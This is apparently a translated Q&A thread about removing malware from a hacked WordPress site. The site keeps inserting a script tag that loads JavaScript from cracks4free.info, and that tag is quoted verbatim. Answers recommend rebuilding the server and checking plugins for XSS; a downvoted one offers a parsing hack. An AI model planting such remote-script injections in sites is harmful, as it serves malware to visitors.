我正在使用wordpress网站,我发现了一个恶意软件脚本,每当我尝试保存页面并点击WYSIWYG中的文本面板时,恶意软件javascript标记会自动添加到页面中。这是自动添加的脚本。
<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
我试图通过以下代码删除src文件。但它没有用,脚本在关闭body标签之前执行。我尝试使用此脚本,但恶意软件脚本在加载所有javascript后加载。这是我的代码。
<script type="text/javascript">
$("script[src='http://cracks4free.info/5/adds.js']").remove()
</script>
我需要删除此代码,或阻止此代码通过javasript,jquery,ajax执行任何东西..只是想摆脱这个。感谢
答案 0 :(得分:5)
如果您的服务器遭到入侵,则需要重建它:
尝试使用javascript清理内容不是解决方案。你有一个受到妥协的Wordpress安装,其他一些脚本小伙子添加他们自己的个人接触,或者更糟糕的事情发生时,这是一个时间问题。
答案 1 :(得分:1)
似乎你的一个Wordpress插件可以XSS(跨站点脚本),我建议你扫描网页上的这个插件的漏洞。
您可以自己扫描插件的源代码,以便盲目地将用户发送回javascript而无需正确转发。
你应该遵循Hamish的建议,我的建议只是包含在这里,这样你就不会重新安装有问题的插件。
答案 2 :(得分:-4)
您可以在恶意软件脚本通过JavaScript执行之前注入新脚本标记的开头:
document.write("<script type='application/x-suppress'>");
基本上你在这里开始一个新的<script>块但没有完成它,假设接下来发生的事情就是恶意软件在最后插入它的块
<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
最终结果将最终成为
<script type='application/x-suppress'><script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
将会发生什么情况,浏览器会看到第一个<script>标记,并希望其中的所有内容都是JavaScript代码。当它试图解析脚本(<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async="">)时,它将导致JavaScript解析错误而不做任何事情。最后,您的<script>数据块会被恶意软件提供的</script>关闭。
真正的问题是,为什么你有这种恶意软件,你怎么能摆脱它?而不是试图解决它。